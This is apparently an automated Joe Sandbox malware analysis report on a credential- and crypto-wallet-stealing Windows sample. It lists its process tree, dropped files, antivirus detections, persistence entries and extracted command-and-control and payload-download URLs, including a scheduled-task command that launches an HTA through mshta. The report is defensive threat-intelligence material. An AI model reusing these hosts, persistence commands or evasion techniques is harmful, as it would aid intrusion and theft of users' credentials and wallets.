Employee Names | Virtual Private Server | Local Accounts | 2 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 11 Scheduled Task/Job | 12 Software Packing | NTDS | 1 Query Registry | Distributed Component Object Model | Input Capture | 1 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | 11 Scheduled Task/Job | Network Logon Script | 1 Registry Run Keys / Startup Folder | 1 Timestomp | LSA Secrets | 1071 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | 3 PowerShell | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 File Deletion | DCSync | 461 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Extra Window Memory Injection | Proc Filesystem | 1 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Masquerading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 461 Virtualization/Sandbox Evasion | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 12 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Mshta | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking

                                      Legend:

                                      • Process
                                      • Signature
                                      • Created File
                                      • DNS/IP Info
                                      • Is Dropped
                                      • Is Windows Process
                                      • Number of created Registry Values
                                      • Number of created Files
                                      • Visual Basic
                                      • Delphi
                                      • Java
                                      • .Net C# or VB.NET
                                      • C, C++ or other language
                                      • Is malicious
                                      • Internet
Behavior Graph ID: 1582701 | Sample: 5EfYBe3nch.exe | Start date: 31/12/2024 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 30 other signatures.

Process tree (graph node numbers in parentheses; the sample root starts nodes 10, 15, 17 and 19):

5EfYBe3nch.exe (10)
• Network: 185.215.113.16 (WHOLESALECONNECTIONSNL, Portugal); 104.21.96.1 (CLOUDFLARENETUS, United States)
• Dropped: C:\Users\user\...\DLTDCR8UJINP8YM8Y.exe (PE32); C:\Users\...\31FYMQUCQX14ZVCZU2HAYNV7V.exe (PE32)
• Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen); 4 other signatures
• Starts: DLTDCR8UJINP8YM8Y.exe (21); 31FYMQUCQX14ZVCZU2HAYNV7V.exe (26)

skotes.exe (15)
• Network: 185.215.113.43 (WHOLESALECONNECTIONSNL, Portugal); 104.18.10.31 (CLOUDFLARENETUS, United States); 31.41.244.11 (AEROEXPRESS-ASRU, Russian Federation)
• Dropped: C:\Users\user\AppData\...\36ac23ea9d.exe (PE32); C:\Users\user\AppData\Local\...\av3EZhq.exe (PE32+); C:\Users\user\AppData\Local\Temp\...\am.exe (PE32); 12 other malicious files
• Signatures: Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
• Starts: eXbhgU9.exe (28); cmd.exe (30); iSHmPkn.exe (32)

cmd.exe (17)
• Dropped: C:\Temp\random.hta (HTML)
• Signatures: Creates HTA files
• Starts: 2 other processes (38)

3 other processes (19)
• Starts: cmd.exe (34); cmd.exe (36); 2 other processes (40)

DLTDCR8UJINP8YM8Y.exe (21)
• Network: 185.215.113.206 (WHOLESALECONNECTIONSNL, Portugal); 127.0.0.1
• Dropped: C:\Users\user\Documents\GIIIIJDHJE.exe (PE32); C:\Users\user\AppData\...\softokn3[1].dll (PE32); C:\Users\user\AppData\Local\...\random[1].exe (PE32); 11 other files (7 malicious)
• Signatures: Detected unpacking (changes PE section rights); Attempt to bypass Chrome Application-Bound Encryption; Drops PE files to the document folder of the user; 7 other signatures
• Starts: cmd.exe (42); chrome.exe (45)

31FYMQUCQX14ZVCZU2HAYNV7V.exe (26)
• Dropped: C:\Users\user\AppData\Local\...\skotes.exe (PE32)
• Signatures: Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); 2 other signatures
• Starts: skotes.exe (48)

eXbhgU9.exe (28)
• Network: 140.82.121.3 (GITHUBUS, United States); 185.199.109.133 (FASTLYUS, Netherlands)
• Dropped: C:\YQNZByFp\jyidkjkfhjawd.exe (PE32)
• Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Adds a directory exclusion to Windows Defender
• Starts: 4 other processes (57)

cmd.exe (30)
• Starts: cmd.exe (50); conhost.exe (53)

iSHmPkn.exe (32)
• Network: 185.244.212.106 (M247GB, Romania)
• Signatures: Antivirus detection for dropped file; 2 other signatures

cmd.exe (34)
• Dropped: C:\Temp\8tA3oGhlP.txt (HTML)
• Starts: 6 other processes (59)

cmd.exe (36)
• Dropped: C:\Temp122LqFjPikt.txt (HTML)
• Starts: 6 other processes (61)

2 other processes (38)
• Signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
• Starts: powershell.exe (55)

cmd.exe (42)
• Signatures: Uses schtasks.exe or at.exe to add and modify task schedules
• Starts: GIIIIJDHJE.exe (63); conhost.exe (66)

chrome.exe (45)
• Network: 192.168.2.4; 239.255.255.250 (Reserved)
• Signatures: Suspicious execution chain found
• Starts: chrome.exe (68)

skotes.exe (48)
• Signatures: Detected unpacking (changes PE section rights); Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Tries to evade debugger and weak emulator (self modifying code); 3 other signatures

cmd.exe (50)
• Dropped: C:\Temp\QZ7iCUD92.txt (HTML); C:\Temp\.gif (HTML)
• Starts: mshta.exe (71); 5 other processes (73)

powershell.exe (55)
• Starts: 2 other processes (75)

4 other processes (57)
• Network: 172.67.179.160 (CLOUDFLARENETUS, United States)
• Signatures: Multi AV Scanner detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Query firmware table information (likely to detect VMs); 5 other signatures
• Starts: 2 other processes (77)

6 other processes (59)
• Starts: 3 other processes (79)

6 other processes (61)
• Signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
• Starts: 3 other processes (81)

GIIIIJDHJE.exe (63)
• Signatures: Detected unpacking (changes PE section rights); Tries to evade debugger and weak emulator (self modifying code); Hides threads from debuggers
• Starts: skotes.exe (83)

chrome.exe (68)
• Network: 142.250.184.206 (GOOGLEUS, United States); 142.250.185.195 (GOOGLEUS, United States); 8 other IPs or domains

mshta.exe (71)
• Signatures: Suspicious powershell command line found; Tries to download and execute files (via powershell)
• Starts: powershell.exe (86)

5 other processes (73)
• Starts: powershell.exe (89); powershell.exe (91)

2 other processes (75)
• Signatures: Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

3 other processes (79)
• Starts: 483d2fa8a0d53818306efeb32d3.exe (93); conhost.exe (95)

3 other processes (81)
• Starts: 483d2fa8a0d53818306efeb32d3.exe (97); conhost.exe (99)

skotes.exe (83)
• Signatures: Hides threads from debuggers; Tries to detect sandboxes / dynamic malware analysis system (registry check); Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

powershell.exe (86)
• Dropped: C:\Users\...\483d2fa8a0d53818306efeb32d3.exe (PE32)
• Starts: 483d2fa8a0d53818306efeb32d3.exe (101); conhost.exe (104)

483d2fa8a0d53818306efeb32d3.exe (101)
• Signatures: Detected unpacking (changes PE section rights); Tries to detect sandboxes and other dynamic analysis tools (window names); Tries to evade debugger and weak emulator (self modifying code); 3 other signatures

Antivirus detection for the submitted sample

Source | Detection | Scanner | Label
5EfYBe3nch.exe | 57% | Virustotal |
5EfYBe3nch.exe | 68% | ReversingLabs | Win32.Spyware.Stealc
5EfYBe3nch.exe | 100% | Avira | TR/Crypt.XPACK.Gen
5EfYBe3nch.exe | 100% | Joe Sandbox ML |
Antivirus detection for dropped files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe | 100% | Avira | TR/Spy.Gen8
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe | 100% | Avira | TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe | 100% | Avira | TR/Spy.Gen8
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\iSHmPkn[1].exe | 100% | Avira | TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe | 100% | Avira | TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\1027024001\am.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\iSHmPkn[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\eXbhgU9[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\am[1].exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe | 100% | Joe Sandbox ML |
C:\ProgramData\freebl3.dll | 0% | ReversingLabs |
C:\ProgramData\mozglue.dll | 0% | ReversingLabs |
C:\ProgramData\msvcp140.dll | 0% | ReversingLabs |
C:\ProgramData\nss3.dll | 0% | ReversingLabs |
C:\ProgramData\softokn3.dll | 0% | ReversingLabs |
C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\av3EZhq[1].exe | 8% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe | 26% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\iSHmPkn[1].exe | 65% | ReversingLabs | Win32.Ransomware.PovertyStealer
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\am[1].exe | 45% | ReversingLabs | Win32.Trojan.Pantera
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\eXbhgU9[1].exe | 30% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\rsn[1].exe | 9% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe | 65% | ReversingLabs | Win32.Ransomware.PovertyStealer
C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe | 30% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Temp\1026850001\rsn.exe | 9% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe | 26% | ReversingLabs | ByteCode-MSIL.Trojan.Zilla
C:\Users\user\AppData\Local\Temp\1027024001\am.exe | 45% | ReversingLabs | Win32.Trojan.Pantera
C:\Users\user\AppData\Local\Temp\1027060001\av3EZhq.exe | 8% | ReversingLabs |
C:\YQNZByFp\jyidkjkfhjawd.exe | 63% | ReversingLabs | Win32.Trojan.LummaStealer
                                      No Antivirus matches
                                      No Antivirus matches
Antivirus detection for URLs (trailing characters after some URLs are carried over from the memory strings they were extracted from)

Source | Detection | Scanner | Label
http://185.215.113.206/c4becf79229cb002.phpET | 100% | Avira URL Cloud | malware
http://185.215.113.16:80/mine/random.exeD | 0% | Avira URL Cloud | safe
http://185.215.113.206/68b591d6548ec281/freebl3.dllNQM | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.phpmT | 100% | Avira URL Cloud | malware
https://fancywaxxers.shop/X | 100% | Avira URL Cloud | malware
https://fancywaxxers.shop/5 | 100% | Avira URL Cloud | malware
https://fancywaxxers.shop/api92 | 100% | Avira URL Cloud | malware
https://fancywaxxers.shop/K | 100% | Avira URL Cloud | malware
https://fancywaxxers.shop/e | 100% | Avira URL Cloud | malware
http://185.215.113.16/mine/random.exev | 0% | Avira URL Cloud | safe
http://185.215.113.206/68b591d6548ec281/nss3.dllnPm | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.phpiS | 100% | Avira URL Cloud | malware
http://185.215.113.206/c4becf79229cb002.php-S0 | 100% | Avira URL Cloud | malware
https://bridge.lg | 0% | Avira URL Cloud | safe
https://fancywaxxers.shop/apiM | 100% | Avira URL Cloud | malware
http://185.215.113.16/L | 0% | Avira URL Cloud | safe
http://185.215.113.16/steam/random.exeX | 0% | Avira URL Cloud | safe
https://fancywaxxers.shop:443/api | 100% | Avira URL Cloud | malware
https://fancywaxxers.shop/api) | 100% | Avira URL Cloud | malware
http://185.215.113.16/mine/random.exeZ | 0% | Avira URL Cloud | safe
http://185.215.113.206/c4becf79229cb002.phpyD | 100% | Avira URL Cloud | malware
                                      No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                                                high
                                                                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exeDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://185.215.113.16/steam/random.exeX5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://support.mozilla.org/products/firefoxgro.all5EfYBe3nch.exe, 00000000.00000003.1759696015.0000000005D2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://fancywaxxers.shop:443/api5EfYBe3nch.exe, 00000000.00000003.1726867792.000000000142D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                                                    unknown
                                                                                                                                                                    http://www.sqlite.org/copyright.html.DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298331003.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000014.00000002.2567296766.0000000006075000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg5EfYBe3nch.exe, 00000000.00000003.1771896524.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1771795973.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.ico5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://raw.githubusercontent.comdeXbhgU9.exe, 00000011.00000002.2753387618.0000000002CD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://185.215.113.206/68b591d6548ec281/msvcp140.dllDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://185.215.113.16/steam/random.exe5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://fancywaxxers.shop/api)5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://github.comdeXbhgU9.exe, 00000011.00000002.2753387618.0000000002C97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://ac.ecosia.org/autocomplete?q=5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://185.215.113.16/5EfYBe3nch.exe, 00000000.00000003.1898833548.00000000014C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg5EfYBe3nch.exe, 00000000.00000003.1771896524.0000000005C21000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1771795973.0000000005C1E000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://crt.rootca1.amazontrust.com/rootca1.cer0?5EfYBe3nch.exe, 00000000.00000003.1758515467.0000000005C53000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000003.2491149415.000000000BFBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://185.215.113.206DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              http://185.215.113.206/c4becf79229cb002.phpyDDLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2278140862.0000000000F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://185.215.113.206/c4becf79229cb002.phpion:DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2273078519.00000000007E5000.00000040.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://fancywaxxers.shop/5EfYBe3nch.exe, 00000000.00000003.1726793450.0000000001463000.00000004.00000020.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1789147203.00000000014AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=5EfYBe3nch.exe, 00000000.00000003.1730782120.0000000005C4C000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1730866185.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1731142814.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, iSHmPkn.exe, 00000010.00000002.2513825124.000000000B877000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582701
Start date and time: 2024-12-31 09:47:01 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 10s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 74
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 5EfYBe3nch.exe
renamed because original name is a hash value
Original Sample Name: 2ba2329d40af33806efdb0bbe5aeb0ad.exe
Detection: MAL
Classification: mal100.phis.troj.spyw.expl.evad.winEXE@128/103@0/23
EGA Information:
• Successful, ratio: 75%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Execution Graph export aborted for target DLTDCR8UJINP8YM8Y.exe, PID 7656 because there are no executed functions
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Skipping network analysis since amount of network traffic is too extensive
Time | Type | Description
03:47:56 | API Interceptor | 9x Sleep call for process: 5EfYBe3nch.exe modified
03:48:45 | API Interceptor | 15x Sleep call for process: DLTDCR8UJINP8YM8Y.exe modified
03:49:01 | API Interceptor | 920669x Sleep call for process: skotes.exe modified
03:49:16 | API Interceptor | 156x Sleep call for process: powershell.exe modified
03:49:35 | API Interceptor | 27x Sleep call for process: eXbhgU9.exe modified
03:49:40 | API Interceptor | 8x Sleep call for process: jyidkjkfhjawd.exe modified
08:48:22 | Task Scheduler | Run new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
08:49:20 | Task Scheduler | Run new task: AutoRunHTA path: cmd.exe s>/c for %f in ("C:\Temp\*.gif") do (copy "%f" "C:\Temp\\random.hta" & start mshta "C:\Temp\\random.hta")
08:49:23 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run am.cmd C:\Users\user\AppData\Local\Temp\1026818021\am.cmd
08:49:32 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run am.cmd C:\Users\user\AppData\Local\Temp\1026818021\am.cmd
08:50:15 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run am.exe C:\Users\user\AppData\Local\Temp\1027024001\am.exe
08:50:18 | Task Scheduler | Run new task: 10DCQZI path: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe
08:50:24 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run am.exe C:\Users\user\AppData\Local\Temp\1027024001\am.exe
08:50:32 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\10DCQZI.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.43 | Dl6wuWiQdg.exe | malicious | LummaC, Amadey, LummaC Stealer
• 185.215.113.43/Zu7JuNko/index.php
185.215.113.43 | o0cabS0OQn.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
• 185.215.113.43/Zu7JuNko/index.php
185.215.113.43 | mDuCbT8LnH.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
• 185.215.113.43/Zu7JuNko/index.php
185.215.113.43 | vVJvxAfBDM.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
• 185.215.113.43/Zu7JuNko/index.php
185.215.113.43 | LIWYEYWSOj.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
• 185.215.113.43/Zu7JuNko/index.php
185.215.113.43 | 8WRONDszv4.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT
• 185.215.113.43/Zu7JuNko/index.php
185.215.113.43 | Idau8QuYa3.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
• 185.215.113.43/Zu7JuNko/index.php
185.215.113.43 | oTZfvSwHTq.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
• 185.215.113.43/Zu7JuNko/index.php
185.215.113.43 | ZBbOXn0a3R.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
• 185.215.113.43/Zu7JuNko/index.php
185.215.113.43 | 0Pm0sadcCP.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
• 185.215.113.43/Zu7JuNko/index.php
1.1.1.1 | 6fW0GedR6j.xls | malicious | Unknown
• 1.1.1.1/ctrl/playback.php
1.1.1.1 | PO-230821_pdf.exe | malicious | FormBook, NSISDropper
• www.974dp.com/sn26/?kJBLpb8=qaEGeuQorcUQurUZCuE8d9pas+Z0M0brqtX248JBolEfq8j8F1R9i1jKZexhxY54UlRG&ML0tl=NZlpi
1.1.1.1 | AFfv8HpACF.exe | malicious | Unknown
• 1.1.1.1/
1.1.1.1 | INVOICE_90990_PDF.exe | malicious | FormBook
• www.quranvisor.com/usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S
1.1.1.1 | Go.exe | malicious | Unknown
• 1.1.1.1/
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | zhMQ0hNEmb.exe | malicious | LummaC
• 104.21.112.1
CLOUDFLARENETUS | 2RxMkSAgZ8.exe | malicious | LummaC
• 104.21.64.1
CLOUDFLARENETUS | Dl6wuWiQdg.exe | malicious | LummaC, Amadey, LummaC Stealer
• 104.21.112.1
CLOUDFLARENETUS | bzzF5OFbVi.exe | malicious | LummaC
• 104.21.64.1
CLOUDFLARENETUS | 6684V5n83w.exe | malicious | Vidar
• 172.64.41.3
CLOUDFLARENETUS | Bp4LoSXw83.lnk | malicious | Unknown
• 172.64.41.3
CLOUDFLARENETUS | x6VtGfW26X.exe | malicious | LummaC
• 104.21.112.1
CLOUDFLARENETUS | heteronymous.vbs | malicious | Remcos, GuLoader
• 172.67.136.42
CLOUDFLARENETUS | re5.mp4.hta | malicious | LummaC
• 188.114.96.3
CLOUDFLARENETUS | file.exe | malicious | Snake Keylogger, VIP Keylogger
• 188.114.96.3
CLOUDFLARENETUS | zhMQ0hNEmb.exe | malicious | LummaC
• 104.21.112.1
CLOUDFLARENETUS | 2RxMkSAgZ8.exe | malicious | LummaC
• 104.21.64.1
